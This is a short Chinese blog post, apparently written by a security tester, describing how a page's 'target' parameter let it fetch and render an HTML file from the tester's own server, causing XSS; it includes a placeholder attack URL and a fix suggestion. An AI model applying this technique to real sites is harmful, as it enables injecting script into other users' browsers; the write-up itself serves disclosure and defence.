无聊日记3-远程文件包含XSS

Posted 秦筱柯

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了无聊日记3-远程文件包含XSS相关的知识,希望对你有一定的参考价值。

深夜睡不着,打开QQ音乐,音乐想起,情到深处,于是我这个菜逼决定写一点最近工作遇到的点。。。

 

1.这周对业务进行全网扫描时,发现几个有趣的URL (漏洞前天已被修复),基本结构形式如下,都带有一个target的参数。

 

 

 

2.看到target,我第一反应是否可以重定向,于是验证了,并未跳转。

 

 

 

3.换了个思路,在我的服务器上搭建简易http服务开启,远程访问我的服务器并读取带有XSS代码的html文件,从而造成XSS攻击

验证:

    1).首先在自己的服务器上搭建简易http服务,并在html文件写入xss弹框。

          

     2).构造攻击链: http://x.x.x.x:x/scrape?target=x.x.x.x:8000/req.html?

     

 

          成功弹框。。。

 

修复建议: 

    服务器侧代码应验证是否允许检索和显示用户输入中的 URL,或根据显示该网址的上下文过滤其响应。

 

以上是关于无聊日记3-远程文件包含XSS的主要内容,如果未能解决你的问题,请参考以下文章

CTFshow刷题日记-WEB-黑盒测试(web380-395)文件包含日志包含getshellSQL注入

利用PHP应用程序中的远程文件包含(RFI)并绕过远程URL包含限制

文件包含漏洞

无聊日记-MAC搭建win10虚拟机进行磁盘分区

九漏洞挖掘与代码审计本地包含与远程包含

Web漏洞知识浅析